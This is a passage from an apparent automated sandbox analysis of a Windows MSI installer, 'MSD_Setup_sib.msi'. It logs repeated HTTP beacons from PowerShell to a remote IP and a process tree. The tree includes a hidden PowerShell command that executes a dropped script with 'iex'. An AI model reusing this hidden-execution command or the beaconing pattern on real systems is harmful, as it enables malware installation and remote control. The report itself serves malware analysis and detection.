ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:45 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
15192.168.2.84972464.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:53.214828968 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:53.370430946 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
16192.168.2.84972564.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:59.837481976 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:00.011498928 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:59 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
17192.168.2.84972664.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:06.511492968 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:06.648271084 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:06 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
18192.168.2.84972764.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:13.120996952 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:13.287854910 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:13 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
19192.168.2.84972864.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:19.773616076 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:19.925986052 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
20192.168.2.84972964.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:26.795236111 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:26.946841002 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:26 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
21192.168.2.84973064.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:33.428757906 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:33.596144915 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:33 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
22192.168.2.84973164.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:40.073586941 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:40.236777067 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:40 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
23192.168.2.84973264.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:46.710803986 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:46.852080107 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:46 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
24192.168.2.84973364.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:53.337820053 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:48:53.498783112 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:48:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
25192.168.2.84973464.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:48:59.984797001 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:00.158278942 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:00 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
26192.168.2.84973564.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:06.651416063 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:06.804924011 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:06 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
27192.168.2.84973664.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:14.521461010 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:14.674582958 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:14 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
28192.168.2.84973764.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:21.150325060 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:21.315376043 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
29192.168.2.84973864.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:27.805634022 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:27.969048023 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
30192.168.2.84973964.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:34.446687937 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:34.599997044 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:34 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
31192.168.2.84974064.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:41.076807976 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:41.220993042 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
32192.168.2.84974164.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:48.789330959 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:48.952688932 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:48 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
33192.168.2.84974264.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:49:55.431893110 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:49:55.581832886 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:49:55 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
34192.168.2.84974364.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:50:03.043348074 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:50:03.192934990 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:50:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination Port
35192.168.2.84974464.95.10.19180
TimestampBytes transferredDirectionData
Apr 23, 2024 17:50:10.671659946 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:50:10.847649097 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:50:10 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination Port
36192.168.2.84974564.95.10.19180
TimestampBytes transferredDirectionData
Apr 23, 2024 17:50:18.316936016 CEST48OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Apr 23, 2024 17:50:18.474848986 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:50:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:17:45:57
Start date:23/04/2024
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\MSD_Setup_sib.msi"
Imagebase:0x7ff63e360000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:17:45:57
Start date:23/04/2024
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x7ff63e360000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:3
Start time:17:45:58
Start date:23/04/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Imagebase:0x7ff65b780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:17:45:58
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:17:45:58
Start date:23/04/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Imagebase:0x7ff6cb6b0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:17:45:58
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:7
Start time:17:46:00
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:8
Start time:17:46:04
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:17:46:07
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:17:46:10
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:17:46:15
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:17:46:18
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:16
Start time:17:46:22
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:17
Start time:17:46:25
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:17:46:28
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:17:46:32
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:17:46:36
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:17:46:39
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:17:46:42
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:17:46:46
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:17:46:47
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:17:46:49
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:17:46:52
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:17:46:56
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:17:46:59
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:17:47:04
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:17:47:07
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:17:47:11
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:17:47:14
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:17:47:18
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:17:47:21
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:17:47:24
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
